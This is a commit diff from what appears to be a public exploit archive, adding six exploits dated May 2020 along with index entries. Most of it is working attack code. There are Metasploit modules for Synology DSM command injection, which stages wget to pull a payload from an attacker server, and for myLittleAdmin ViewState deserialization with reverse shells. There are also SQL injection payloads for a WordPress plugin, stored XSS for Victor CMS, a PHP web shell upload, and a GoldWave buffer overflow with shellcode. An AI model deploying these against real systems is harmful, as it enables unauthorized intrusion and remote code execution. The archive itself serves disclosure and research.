DB: 2020-05-26

6 changes to exploits/shellcodes GoldWave - Buffer Overflow (SEH Unicode) Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit) Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit) Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated) Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting Online Discussion Forum Site 1.0 - Remote Code Execution
2020-05-26 05:01:56 +00:00 · 2020-05-26 05:01:56 +00:00 · 4fbd3630c8
commit 4fbd3630c8
parent 5308efc65c
7 changed files with 647 additions and 0 deletions
--- a/exploits/hardware/remote/48514.rb
+++ b/exploits/hardware/remote/48514.rb
@ -0,0 +1,209 @@
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::FileDropper
  DEVICE_INFO_PATTERN = /major=(?<major>\d+)&minor=(?<minor>\d+)&build=(?<build>\d+)
                        &junior=\d+&unique=synology_\w+_(?<model>[^&]+)/x.freeze
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Synology DiskStation Manager smart.cgi Remote Command Execution',
        'Description' => %q{
          This module exploits a vulnerability found in Synology DiskStation Manager (DSM)
          versions < 5.2-5967-5, which allows the execution of arbitrary commands under root
          privileges after website authentication.
          The vulnerability is located in webman/modules/StorageManager/smart.cgi, which
          allows appending of a command to the device to be scanned.  However, the command
          with drive is limited to 30 characters.  A somewhat valid drive name is required,
          thus /dev/sd is used, even though it doesn't exist.  To circumvent the character
          restriction, a wget input file is staged in /a, and executed to download our payload
          to /b.  From there the payload is executed.  A wfsdelay is required to give time
          for the payload to download, and the execution of it to run.
        },
        'Author' =>
          [
            'Nigusu Kassahun', # Discovery
            'h00die' # metasploit module
          ],
        'References' =>
          [
            [ 'CVE', '2017-15889' ],
            [ 'EDB', '43190' ],
            [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-synology-storagemanager-smart-cgi-remote-command-execution/' ],
            [ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ]
          ],
        'Privileged' => true,
        'Stance' => Msf::Exploit::Stance::Aggressive,
        'Platform' => ['python'],
        'Arch' => [ARCH_PYTHON],
        'Targets' =>
          [
            ['Automatic', {}]
          ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PrependMigrate' => true,
          'WfsDelay' => 10
        },
        'License' => MSF_LICENSE,
        'DisclosureDate' => 'Nov 08 2017'
      )
    )
    register_options(
      [
        Opt::RPORT(5000),
        OptString.new('TARGETURI', [true, 'The URI of the Synology Website', '/']),
        OptString.new('USERNAME', [true, 'The Username for Synology', 'admin']),
        OptString.new('PASSWORD', [true, 'The Password for Synology', ''])
      ]
    )
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false])
    ]
  end
  def check
    vprint_status('Trying to detect installed version')
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'webman', 'info.cgi'),
      'vars_get' => { 'host' => '' }
    })
    if res && (res.code == 200) && res.body =~ DEVICE_INFO_PATTERN
      version = "#{$LAST_MATCH_INFO[:major]}.#{$LAST_MATCH_INFO[:minor]}"
      build = $LAST_MATCH_INFO[:build]
      model = $LAST_MATCH_INFO[:model].sub(/^[a-z]+/) { |s| s[0].upcase }
      model = "DS#{model}" unless model =~ /^[A-Z]/
    else
      vprint_error('Detection failed')
      return CheckCode::Unknown
    end
    vprint_status("Model #{model} with version #{version}-#{build} detected")
    case version
    when '3.0', '4.0', '4.1', '4.2', '4.3', '5.0', '5.1'
      return CheckCode::Appears
    when '5.2'
      return CheckCode::Appears if build < '5967-5'
    end
    CheckCode::Safe
  end
  def on_request_uri(cli, _request, cookie, token)
    print_good('HTTP Server request received, sending payload')
    send_response(cli, payload.encoded)
    print_status('Executing payload')
    inject_request(cookie, token, 'python b')
  end
  def inject_request(cookie, token, cmd = '')
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'webman', 'modules', 'StorageManager', 'smart.cgi'),
      'cookie' => cookie,
      'headers' => {
        'X-SYNO-TOKEN' => token
      },
      'vars_post' => {
        'action' => 'apply',
        'operation' => 'quick',
        'disk' => "/dev/sd`#{cmd}`"
      }
    })
  end
  def login
    # If you try to debug login through the browser, you'll see that desktop.js calls
    # ux-all.js to do an RSA encrypted login.
    # Wowever in a stroke of luck Mrs. h00die caused
    # a power sag while tracing/debugging the loging, causing the NAS to power off.
    # when that happened, it failed to get the crypto vars, and defaulted to a
    # non-encrypted login, which seems to work just fine.  greetz Mrs. h00die!
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'webman', 'login.cgi'),
      'vars_get' => { 'enable_syno_token' => 'yes' },
      'vars_post' => {
        'username' => datastore['USERNAME'],
        'passwd' => datastore['PASSWORD'],
        'OTPcode' => '',
        '__cIpHeRtExT' => '',
        'client_time' => Time.now.to_i,
        'isIframeLogin' => 'yes'
      }
    })
    if res && %r{<div id='synology'>(?<json>.*)</div>}m =~ res.body
      result = JSON.parse(json)
      fail_with(Failure::BadConfig, 'Incorrect Username/Password') if result['result'] == 'error'
      if result['result'] == 'success'
        return res.get_cookies, result['SynoToken']
      end
      fail_with(Failure::Unknown, "Unknown response: #{result}")
    end
  end
  def exploit
    unless check == CheckCode::Appears
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end
    if datastore['SRVHOST'] == '0.0.0.0'
      fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful')
    end
    begin
      print_status('Attempting Login')
      cookie, token = login
      start_service({ 'Uri' => {
        'Proc' => proc do |cli, req|
          on_request_uri(cli, req, cookie, token)
        end,
        'Path' => '/'
      } })
      print_status('Cleaning env')
      inject_request(cookie, token, cmd = 'rm -rf /a')
      inject_request(cookie, token, cmd = 'rm -rf b')
      command = "#{datastore['SRVHOST']}:#{datastore['SRVPORT']}".split(//)
      command_space = 22 - "echo -n ''>>/a".length
      command_space -= 1
      command.each_slice(command_space) do |a|
        a = a.join('')
        vprint_status("Staging wget with: echo -n '#{a}'>>/a")
        inject_request(cookie, token, cmd = "echo -n '#{a}'>>/a")
      end
      print_status('Requesting payload pull')
      register_file_for_cleanup('/usr/syno/synoman/webman/modules/StorageManager/b')
      register_file_for_cleanup('/a')
      inject_request(cookie, token, cmd = 'wget -i /a -O b')
      # at this point we let the HTTP server call the last stage
      # wfsdelay should be long enough to hold out for everything to download and run
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end
 end
--- a/exploits/php/webapps/48509.txt
+++ b/exploits/php/webapps/48509.txt
@ -0,0 +1,56 @@
 # Exploit Title: Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)
 # Exploit Author: SunCSR (Sun* Cyber Security Research)
 # Date: 2020 - 5 - 22
 # Vender Homepage: https://help.10web.io/
 # Version: <= 5.4.1
 # Tested on: Ubuntu 18.04
 Description:
 SQL injection in the Form Maker by 10Web WordPress Plugin before 5.4.1
 exists via the /wordpress/wp-admin/admin.php?page=blocked_ips_fm&s=1" s
 parameter.
 Poc:
 GET /wordpress/wp-admin/admin.php?page=blocked_ips_fm&s=1" HTTP/1.1
 Host: test-wp.com
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101
 Firefox/76.0
 Accept:
 text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Connection: close
 Cookie:
 wordpress_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C96d43f4ee5cf009365c9722f461d538f96a62637094759cb6fb7a9f54edac171;
 wordpress_test_cookie=WP+Cookie+check;
 wordpress_logged_in_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C9a63283d84855ed6eeae8e4b5f3a405fba003ddd15748bf5cdca5caaca228a19;
 wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1590140574;
 PHPSESSID=5bpdr8tbj5furvccoadjjj2sgb
 Upgrade-Insecure-Requests: 1
 SQLMap using:
 sqlmap -u '
 http://test-wp.com:80/wordpress/wp-admin/admin.php?page=blocked_ips_fm&s=123'
 --cookie='wordpress_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C96d43f4ee5cf009365c9722f461d538f96a62637094759cb6fb7a9f54edac171;wordpress_test_cookie=WP+Cookie+check;wordpress_logged_in_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C9a63283d84855ed6eeae8e4b5f3a405fba003ddd15748bf5cdca5caaca228a19;wp-settings-1=libraryContent%3Dbrowse;wp-settings-time-1=1590140574;PHPSESSID=5bpdr8tbj5furvccoadjjj2sgb'
 Parameter: s (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: page=blocked_ips_fm&s=-1027" OR 8913=8913#
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
 BY clause (FLOOR)
    Payload: page=blocked_ips_fm&s=123" AND (SELECT 2867 FROM(SELECT
 COUNT(*),CONCAT(0x717a707871,(SELECT
 (ELT(2867=2867,1))),0x71787a7671,FLOOR(RAND(0)*2))x FROM
 INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- TxQH
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: page=blocked_ips_fm&s=123" AND SLEEP(5)-- oPEC
 ---
 [17:20:17] [INFO] the back-end DBMS is MySQL
 web server operating system: Linux Ubuntu
 web application technology: Apache 2.4.29
 back-end DBMS: MySQL >= 5.0
--- a/exploits/php/webapps/48511.txt
+++ b/exploits/php/webapps/48511.txt
@ -0,0 +1,66 @@
 # Exploit Title: Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting
 # Google Dork: N/A 
 # Date: 2020-05-23 
 # Exploit Author: Nitya Nand 
 # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite 
 # Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip 
 # Version: 1.0 
 # Tested on: Linux 
 # CVE : N/A
 Description: The POST parameter 'user_name', 'user_firstname', 'user_lastname' is vulnerable to persistent cross site scripting Payload: <script>alert(1)</script>
 POST /phpmaster/admin/users.php?source=add_user HTTP/1.1
 Host: localhost
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://localhost/phpmaster/admin/users.php?source=add_user
 Content-Type: multipart/form-data; boundary=---------------------------515906178311115682892435428
 Content-Length: 417375
 Connection: close
 Cookie: PHPSESSID=8810e038f92cd7c711ee8b95db1dcacb
 Upgrade-Insecure-Requests: 1
 -----------------------------515906178311115682892435428
 Content-Disposition: form-data; name="user_name"
 "><script>alert(1)</script>
 -----------------------------515906178311115682892435428
 Content-Disposition: form-data; name="user_firstname"
 "><script>alert(2)</script>
 -----------------------------515906178311115682892435428
 Content-Disposition: form-data; name="user_lastname"
 "><script>alert(3)</script>
 -----------------------------515906178311115682892435428
 Content-Disposition: form-data; name="user_image"; filename="9400.jpg"
 Content-Type: image/jpeg
 -----------------------------515906178311115682892435428
 Content-Disposition: form-data; name="user_role"
 User
 -----------------------------515906178311115682892435428
 Content-Disposition: form-data; name="user_email"
 abc@gmail.com
 -----------------------------515906178311115682892435428
 Content-Disposition: form-data; name="user_password"
 1234
 -----------------------------515906178311115682892435428
 Content-Disposition: form-data; name="create_user"
 Add User
 -----------------------------515906178311115682892435428--
--- a/exploits/php/webapps/48512.txt
+++ b/exploits/php/webapps/48512.txt
@ -0,0 +1,21 @@
 # Exploit Title: Online Discussion Forum Site 1.0 - Remote Code Execution
 # Google Dork: N/A
 # Date: 2020-05-24
 # Exploit Author: Selim Enes 'Enesdex' Karaduman
 # Vendor Homepage: https://www.sourcecodester.com/php/14233/online-discussion-forum-site.html
 # Software Link: https://www.sourcecodester.com/download-code?nid=14233&title=Online+Discussion+Forum+Site
 # Version: 1.0 (REQUIRED)
 # Tested on: Windows 10 / Wamp Server
 # CVE : N/A
 Go to http://localhost/Online%20Discussion%20Forum%20Site/register.php register page to sign up
 Then fill other fields and upload the shell.php with following PHP-shell-code
 <?php
 $command = shell_exec($_REQUEST['cmd']);
 echo $command;
 ?>
 After the registration process is completed go to the following page and execute the os command via uploaded shell
 http://localhost/Online%20Discussion%20Forum%20Site/ups/shell.php?cmd=$THECODE-YOU-WANT-TO-EXECUTE
 Any unauthenticated attacker is able to execute arbitrary os command
--- a/exploits/windows/local/48510.py
+++ b/exploits/windows/local/48510.py
@ -0,0 +1,80 @@
 # Exploit Title: GoldWave 5.70 – Buffer Overflow (SEH Unicode)
 # Date: 2020-05-14
 # Exploit Author: Andy Bowden
 # Vendor Homepage: https://www.goldwave.com/
 # Version: 5.70
 # Download Link: http://goldwave.com//downloads/gwave570.exe
 # Tested on: Windows 10 x86
 # PoC
 # 1. generate crash.txt, copy contents to clipboard
 # 2. open gold wave app
 # 3. select File, Open URL...
 # 4. paste contents from clipboard after 'http://'
 # 5. select OK
 f = open("crash.txt", "wb")
 buf = b""
 buf += b"\x41" * 1019
 buf += b"\x71\x71" # Unicode NOP
 buf += b"\xB3\x48" # 0x004800b3 | pop ecx, pop ebp, ret
 #realigning stack
 buf += b"\x75" # Unicode NOP
 buf += b"\x54" # Push ESP
 buf += b"\x75" # Unicode NOP
 buf += b"\x58" # POP EAX
 buf += b"\x75" # Unicode NOP
 buf += b"\x05\xFF\x10" # ADD EAX,
 buf += b"\x75" # Unicode NOP
 buf += b"\x2d\xEA\x10" # SUB EAX,
 buf += b"\x75"
 buf += b"\x71" * 595
 #msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper
 BufferRegister=EAX -f python
 buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51"
 buf += b"\x41\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44"
 buf += b"\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41"
 buf += b"\x51\x41\x49\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50"
 buf += b"\x41\x5a\x31\x41\x49\x31\x41\x49\x41\x49\x41\x4a\x31"
 buf += b"\x31\x41\x49\x41\x49\x41\x58\x41\x35\x38\x41\x41\x50"
 buf += b"\x41\x5a\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49"
 buf += b"\x41\x49\x51\x49\x31\x31\x31\x31\x41\x49\x41\x4a\x51"
 buf += b"\x49\x31\x41\x59\x41\x5a\x42\x41\x42\x41\x42\x41\x42"
 buf += b"\x41\x42\x33\x30\x41\x50\x42\x39\x34\x34\x4a\x42\x4b"
 buf += b"\x4c\x59\x58\x35\x32\x4b\x50\x4b\x50\x4d\x30\x31\x50"
 buf += b"\x43\x59\x4b\x35\x50\x31\x39\x30\x42\x44\x54\x4b\x50"
 buf += b"\x50\x30\x30\x54\x4b\x42\x32\x4c\x4c\x54\x4b\x31\x42"
 buf += b"\x4c\x54\x54\x4b\x34\x32\x4f\x38\x4c\x4f\x48\x37\x50"
 buf += b"\x4a\x4f\x36\x50\x31\x4b\x4f\x36\x4c\x4f\x4c\x31\x51"
 buf += b"\x43\x4c\x4c\x42\x4e\x4c\x4f\x30\x39\x31\x38\x4f\x4c"
 buf += b"\x4d\x4d\x31\x59\x37\x4a\x42\x4a\x52\x42\x32\x51\x47"
 buf += b"\x34\x4b\x50\x52\x4c\x50\x34\x4b\x30\x4a\x4f\x4c\x54"
 buf += b"\x4b\x30\x4c\x4e\x31\x34\x38\x4b\x33\x30\x48\x4b\x51"
 buf += b"\x4a\x31\x30\x51\x54\x4b\x50\x59\x4d\x50\x4d\x31\x5a"
 buf += b"\x33\x44\x4b\x31\x39\x4c\x58\x39\x53\x4e\x5a\x30\x49"
 buf += b"\x44\x4b\x4e\x54\x34\x4b\x4d\x31\x4a\x36\x4e\x51\x4b"
 buf += b"\x4f\x36\x4c\x59\x31\x38\x4f\x4c\x4d\x4b\x51\x49\x37"
 buf += b"\x4e\x58\x4b\x30\x52\x55\x4b\x46\x4c\x43\x43\x4d\x4c"
 buf += b"\x38\x4f\x4b\x43\x4d\x4e\x44\x42\x55\x5a\x44\x30\x58"
 buf += b"\x54\x4b\x52\x38\x4e\x44\x4b\x51\x59\x43\x31\x56\x34"
 buf += b"\x4b\x4c\x4c\x50\x4b\x34\x4b\x50\x58\x4d\x4c\x4b\x51"
 buf += b"\x39\x43\x44\x4b\x4d\x34\x44\x4b\x4b\x51\x4a\x30\x35"
 buf += b"\x39\x30\x44\x4d\x54\x4d\x54\x31\x4b\x51\x4b\x53\x31"
 buf += b"\x50\x59\x50\x5a\x32\x31\x4b\x4f\x49\x50\x31\x4f\x31"
 buf += b"\x4f\x31\x4a\x34\x4b\x4e\x32\x4a\x4b\x54\x4d\x51\x4d"
 buf += b"\x51\x5a\x4b\x51\x54\x4d\x54\x45\x46\x52\x4b\x50\x4d"
 buf += b"\x30\x4b\x50\x32\x30\x33\x38\x4e\x51\x34\x4b\x42\x4f"
 buf += b"\x34\x47\x4b\x4f\x49\x45\x57\x4b\x5a\x50\x38\x35\x45"
 buf += b"\x52\x52\x36\x42\x48\x37\x36\x34\x55\x47\x4d\x55\x4d"
 buf += b"\x4b\x4f\x4a\x35\x4f\x4c\x4c\x46\x33\x4c\x4c\x4a\x43"
 buf += b"\x50\x4b\x4b\x39\x50\x33\x45\x4d\x35\x47\x4b\x50\x47"
 buf += b"\x4e\x33\x42\x52\x42\x4f\x31\x5a\x4b\x50\x50\x53\x4b"
 buf += b"\x4f\x49\x45\x52\x43\x53\x31\x42\x4c\x53\x33\x4e\x4e"
 buf += b"\x32\x45\x34\x38\x53\x35\x4b\x50\x41\x41"
 buf += b"\x44" * (5000 - len(buf))
 f.write(buf)
 f.close()
--- a/exploits/windows/remote/48513.rb
+++ b/exploits/windows/remote/48513.rb
@ -0,0 +1,209 @@
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  # <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
  VIEWSTATE_GENERATOR = 'CA0B0334'.freeze
  # <machineKey
  #   validationKey="5C7EEF6650639D2CB8FAA0DA36AF24452DCF69065F2EDC2C8F2F44C0220BE2E5889CA01A207FC5FCE62D1A5A4F6D2410722261E6A33E77E0628B17AA928039BF"
  #   decryptionKey="DC47E74EA278F789D2FF0E412AD840A89C10171F408D8AC4"
  #   validation="SHA1" />
  VIEWSTATE_VALIDATION_KEY =
    "\x5c\x7e\xef\x66\x50\x63\x9d\x2c\xb8\xfa\xa0\xda\x36\xaf\x24\x45\x2d\xcf" \
    "\x69\x06\x5f\x2e\xdc\x2c\x8f\x2f\x44\xc0\x22\x0b\xe2\xe5\x88\x9c\xa0\x1a" \
    "\x20\x7f\xc5\xfc\xe6\x2d\x1a\x5a\x4f\x6d\x24\x10\x72\x22\x61\xe6\xa3\x3e" \
    "\x77\xe0\x62\x8b\x17\xaa\x92\x80\x39\xbf".freeze
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::ViewState
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Plesk/myLittleAdmin ViewState .NET Deserialization',
        'Description' => %q{
          This module exploits a ViewState .NET deserialization vulnerability in
          web-based MS SQL Server management tool myLittleAdmin, for version 3.8
          and likely older versions, due to hardcoded <machineKey> parameters in
          the web.config file for ASP.NET.
          Popular web hosting control panel Plesk offers myLittleAdmin as an
          optional component that is selected automatically during "full"
          installation. This exploit caters to the Plesk target, though it
          should work fine against a standalone myLittleAdmin setup.
          Successful exploitation results in code execution as the user running
          myLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described as
          the "SQL Admin MSSQL anonymous account."
          Tested on the latest Plesk Obsidian with optional myLittleAdmin 3.8.
        },
        'Author' => [
          # Reported to SSD (SecuriTeam) by an anonymous researcher
          # Publicly disclosed by Noam Rathaus of SSD (SecuriTeam)
          'Spencer McIntyre', # Inspiration
          'wvu' # Module
        ],
        'References' => [
          ['CVE', '2020-13166'],
          ['URL', 'https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/'],
          ['URL', 'https://portswigger.net/daily-swig/mylittleadmin-has-a-big-unpatched-security-flaw']
        ],
        'DisclosureDate' => '2020-05-15', # SSD (SecuriTeam) advisory
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Privileged' => false,
        'Targets' => [
          [
            'Windows Command',
            'Arch' => ARCH_CMD,
            'Type' => :win_cmd,
            'DefaultOptions' => {
              'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
            }
          ],
          [
            'Windows Dropper',
            'Arch' => [ARCH_X86, ARCH_X64],
            'Type' => :win_dropper,
            'CmdStagerFlavor' => %i[psh_invokewebrequest certutil vbs],
            'DefaultOptions' => {
              'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,
              'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
            }
          ],
          [
            'PowerShell Stager',
            'Arch' => [ARCH_X86, ARCH_X64],
            'Type' => :psh_stager,
            'DefaultOptions' => {
              'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
            }
          ]
        ],
        'DefaultTarget' => 2,
        'DefaultOptions' => {
          'SSL' => true,
          'WfsDelay' => 10 # First exploit attempt may be a little slow
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
    register_options([
      Opt::RPORT(8401, true, 'The myLittleAdmin port (default for Plesk!)'),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
    # XXX: https://github.com/rapid7/metasploit-framework/issues/12963
    import_target_defaults
  end
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path)
    )
    unless res
      return CheckCode::Unknown('Target did not respond to check request.')
    end
    unless res.code == 200 && res.body.include?('myLittleAdmin for SQL Server')
      return CheckCode::Unknown('Target is not running myLittleAdmin.')
    end
    vprint_good("myLittleAdmin is running at #{full_uri}")
    check_viewstate(res.get_html_document)
  end
  def check_viewstate(html)
    viewstate = html.at('//input[@id = "__VIEWSTATE"]/@value')&.text
    unless viewstate
      return CheckCode::Detected("__VIEWSTATE not found, can't complete check.")
    end
    @viewstate_generator =
      html.at('//input[@id = "__VIEWSTATEGENERATOR"]/@value')&.text
    unless @viewstate_generator
      print_warning('__VIEWSTATEGENERATOR not found, using known default value')
      @viewstate_generator = VIEWSTATE_GENERATOR
    end
    # ViewState generator needs to be a packed integer now
    @viewstate_generator = [@viewstate_generator.to_i(16)].pack('V')
    we_can_sign_viewstate = can_sign_viewstate?(
      viewstate,
      extra: @viewstate_generator,
      key: VIEWSTATE_VALIDATION_KEY
    )
    if we_can_sign_viewstate
      return CheckCode::Vulnerable('We can sign our own ViewState.')
    end
    CheckCode::Safe("We can't sign our own ViewState.")
  end
  def exploit
    # NOTE: Automatic check is implemented by the AutoCheck mixin
    super
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    case target['Type']
    when :win_cmd
      execute_command(payload.encoded)
    when :win_dropper
      execute_cmdstager
    when :psh_stager
      execute_command(cmd_psh_payload(
        payload.encoded,
        payload.arch.first,
        remove_comspec: true
      ))
    end
  end
  def execute_command(cmd, _opts = {})
    vprint_status("Serializing command: #{cmd}")
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path),
      'vars_post' => {
        # This is the only parameter we need for successful exploitation!
        '__VIEWSTATE' => generate_viewstate_payload(
          cmd,
          extra: @viewstate_generator,
          key: VIEWSTATE_VALIDATION_KEY
        )
      }
    )
    unless res && res.code == 302 && res.redirection.path == '/error/index.html'
      fail_with(Failure::PayloadFailed, "Could not execute command: #{cmd}")
    end
    print_good("Successfully executed command: #{cmd}")
  end
 end
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11081,6 +11081,7 @@ id,file,description,date,author,type,platform,port
 48499,exploits/windows/local/48499.txt,"CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)",2020-05-21,"Xenofon Vassilakopoulos",local,windows,
 48505,exploits/windows/local/48505.txt,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation",2020-05-22,"Matteo Malvica",local,windows,
 48507,exploits/windows/local/48507.py,"VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)",2020-05-22,Gobinathan,local,windows,
 48510,exploits/windows/local/48510.py,"GoldWave - Buffer Overflow (SEH Unicode)",2020-05-25,"Andy Bowden",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -18157,6 +18158,8 @@ id,file,description,date,author,type,platform,port
 48483,exploits/multiple/remote/48483.txt,"HP LinuxKI 6.01 - Remote Command Injection",2020-05-18,"Cody Winkler",remote,multiple,
 48491,exploits/php/remote/48491.rb,"Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)",2020-05-19,Metasploit,remote,php,
 48508,exploits/multiple/remote/48508.rb,"WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)",2020-05-22,Metasploit,remote,multiple,
 48513,exploits/windows/remote/48513.rb,"Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)",2020-05-25,Metasploit,remote,windows,
 48514,exploits/hardware/remote/48514.rb,"Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)",2020-05-25,Metasploit,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -42736,3 +42739,6 @@ id,file,description,date,author,type,platform,port
 48500,exploits/multiple/webapps/48500.txt,"OpenEDX platform Ironwood 2.5 - Remote Code Execution",2020-05-21,"Daniel Monzón",webapps,multiple,
 48504,exploits/php/webapps/48504.txt,"Dolibarr 11.0.3 - Persistent Cross-Site Scripting",2020-05-22,"Mehmet Kelepçe",webapps,php,
 48506,exploits/php/webapps/48506.py,"Gym Management System 1.0 - Unauthenticated Remote Code Execution",2020-05-22,boku,webapps,php,
 48509,exploits/php/webapps/48509.txt,"Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)",2020-05-25,SunCSR,webapps,php,
 48511,exploits/php/webapps/48511.txt,"Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting",2020-05-25,"Nitya Nand",webapps,php,
 48512,exploits/php/webapps/48512.txt,"Online Discussion Forum Site 1.0 - Remote Code Execution",2020-05-25,Enesdex,webapps,php,